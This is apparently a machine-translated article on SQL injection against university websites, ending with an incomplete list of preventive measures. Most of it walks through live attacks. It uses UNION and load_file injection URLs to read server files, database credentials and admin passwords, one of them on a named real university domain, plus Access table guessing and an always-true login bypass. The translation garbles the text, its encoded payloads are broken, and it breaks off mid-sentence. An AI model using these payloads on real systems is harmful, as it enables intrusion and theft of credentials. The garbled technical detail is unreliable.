Test and prevent SQL Injection for university websites

Text/FIG
==========================================
Some campus websites belong to schools, some belong to a certain school, some belong to a certain community organization, some website servers are maintained by technicians, and some websites are not maintained by special personnel, no one manages the server system after it is built, or the management is messy. Vulnerabilities that are popular on the Internet and even obsolete can be found here. Therefore, campus websites are often the targets of attackers, and some are even attacked by attackers as the springboard of attacks. Therefore, it is usually necessary to test it to identify and fix vulnerabilities in advance.
Although SQL injection is popular for many times, its attack methods continue to develop and prevention measures are not enough. Due to the diversity of dynamic languages, Web servers, and database servers, there is no general solution yet, it is still a major threat to Web security due to various reasons. This attack is still very powerful for campus networks that have both external and internal security threats. The main function of a campus website is to publish information, so only small and medium databases can be used as backend databases. It is common to use MySQL + PHP or Access + ASP, the two combinations are discussed below.

MySQL + PHP
The overall security performance of MySQL + PHP is better. When php. when magic_quotes_gpc in ini is on, ",", and NULL characters (NULL) in the variables submitted in the form of GET/POST/COOKIE) automatically add a backslash to the front to prevent most common injections. The union statement is not supported in versions earlier than MySQL 4. Therefore, when versions earlier than MySQL 4 are used, the union query commonly used in SQL injection is invalid.
In this test, the website has the SQL injection vulnerability because its board_news_id parameter is not strictly checked and handed in to the database for execution. Submit the following statement, as shown in result 1.
Http://xxx.xxx.edu.cn/board/show_board_news.php? Board_news_id = 884% 20and % 201 = 2% 20 union % 20 select %, 11
 
Figure 1
Use load_file to view the content of c:/boot. ini. C:/boot. ini is converted into char (111,111,116, 46,105,110,105,). submit the following statement, as shown in result 2.
Http://xxx.xxx.edu.cn/board/show_board_news.php? Board_news_id = 884/**/and/**/1 = 2/**/union/**/select/**/, load_file (char, 111,111,116, 46,105,110,105 ),
 
Figure 2
Check the content of php. ini. Since the system is Window 2000 Advanced Server, the system directory should be C: winnt. Try C: winntphp. ini. Submit the following statement, as shown in result 3. It can be seen that magic_qutoes_gpc = on, so only injection statements without single quotes can be constructed for injection.
Http://xxx.xxx.edu.cn/board/show_board_news.php? Board_news_id = 884/**/and/**/1 = 2/**/union/**/select/**/47,119,105,110,110,116, load_file (char, 47,112,104,112, 46,105,110,105 ),
 
Figure 3
Next, we will expose the user account information in its admin table. With this information, you can log on to the background and have administrator privileges. Submit the following statement, as shown in result 4.
Http://www.sim.whu.edu.cn/board/show_board_news.php? Board_news_id = 880/**/and/**/1 = 2/**/union/**/select/**/1, admin_name, admin_password, 6, 7, 8, 9, 10, 11% 20 from % 20 admin
 
Figure 4
In fact, we can use the Load_file function to obtain the user account information of the MySQL database. Use it to first view Show_board_news.php. Because this website does not shield error information, constructing an incorrect parameter submission will directly give the physical path D: ewsimoardshow_board_news.php. After the path is ASCII encoded, submit the following statement, result 5 is displayed.
Http://xxx.xxx.edu.cn/board/show_board_news.php? Board_news_id = 884/**/and/**/1 = 2/**/union/**/select/**/47,110,101,119,115,105,109, load_file (char, 47,98, 111,97, 114,100, 47,115,104,111,119, 114,100, 98, 111,97, 95,110,101,119,

112,104,112 ,),
 
Figure 5
This include/conn. php may contain information about connecting to the database, so let's look at it using the load_file function. Submit the following statement, as shown in result 6.
Http://xxx.xxx.edu.cn/board/show_board_news.php? Board_news_id = 884/**/and/**/1 = 2/**/union/**/select/**/47,110,101,119,115,105,109, load_file (char, 47,105,110, 99,108,117,100,101, 111,110,110, 46,112,104,112 ,),
 
Figure 6
View the source code to see the account information used to connect to the database, as shown in 7. Even if magic_qutoes_gpc = on is set for this website, we can still inject the website successfully and obtain some sensitive information.
 
Figure 7

Access + ASP
Because Access + ASP is simple and quick to build websites, websites like this on the campus network are always accessible. The example I selected during the test has almost no protection against SQL injection. In the address bar, enter asp? Id = 636 "> http://xxx.xxx.edu.cn/read.asp? Id = 636 "error prompted, entering http://xxx.xxx.edu.cn/read.asp? Id = 636% 20and % 201 = 1 can be displayed normally, enter http://xxx.xxx.edu.cn/read.asp? Id = 636% 20and % 201 = 2 "indicates an error. This proves that it does not filter user input. Maybe the website administrator has not been concerned about the security of the website for a long time. The SQL Injection problem has been detected for so long and has not been prevented yet! The Access injection method is simple. Just do it step by step. Then, you can guess the table name, field name, and field value of the database to obtain sensitive information such as the administrator's username and password.
Submit http://xxx.xxx.edu.cn/read.asp? Id = 636% 20and % 20 (select % 20 count (*) % 20 from
% 20 admin) = 6 "is displayed normally, indicating that the table admin exists and there are 6 records. The following task is handed over to the tool, and the administrator username and password are obtained soon. To my surprise, there is actually a weak password with the username "admin" and the password "admin". This is not an explicit attack.
Log on to the background to see what can be used. As a result, an error message indicating that the IP address is not within the permitted access range is displayed, indicating that the access fails. It seems that the Administrator has left a hand, and the IP addresses allowed to access may be several specific trusted IP addresses.
After a stroll on the home page, we found that there was a related link column under the home page, which contains a series of hyperlinks. Generally, servers in the courtyard will be mounted to many subordinate websites, so you can consider the additional considerations. Click a link and you will find that this website page is also in the Access + ASP structure. Check the IP address, which is indeed the same as the previous website and has the same SQL injection vulnerability. Its background is very easy to find, and there is a link on the home page. The password for Logon verification does not contain any special characters. The system enters the background with "1" or "1" = "1.

Preventive Measures
This test targets the SQL injection vulnerability. Even if common attack methods are used, the exposed problems are still serious. Therefore, you must promptly fix the vulnerabilities and prevent them.
Generally, websites add special character filtering statements to their website program logic, or attach a general anti-injection module. However, these injection prevention measures are not very satisfactory. For example, some filter "select", but not filter "SELect", and some process parameters submitted by the Post and Get methods, however, no restrictions are imposed on the parameters read from the Cookie and submitted to the database. There are many preventive methods, but none of them are thorough. Each method has its own advantages and disadvantages.
1) Use the replace () function to convert single quotes into double quotes. This is a protection against common attacks to some extent, but it can still be broken through by malicious attackers. Common SQL injection attacks include secondary SQL injection and SQL injection attacks that use truncation technology.
2) feature matching. Sensitive characters including "OR", "AND", ";", "", "SELECT", "INSERT", "UPDATE", AND "DROP" are filtered out ", "Xp _", "HAVING", "group by", "UNION ". Such preventive measures are prone to false positives, and attackers can use hexadecimal notation or char () or concat () notation to represent these sensitive characters or strings, using different character sets and encoding methods, you can also add spaces, tabs, and comments to sensitive strings to avoid successful feature matching.
3) Disable Error information. Direct SQL injection attacks obtain some sensitive information through error pages, which can be prevented by blocking error information. However, the blind injection has developed again, generally through the if judgment and the delay function.
4 )&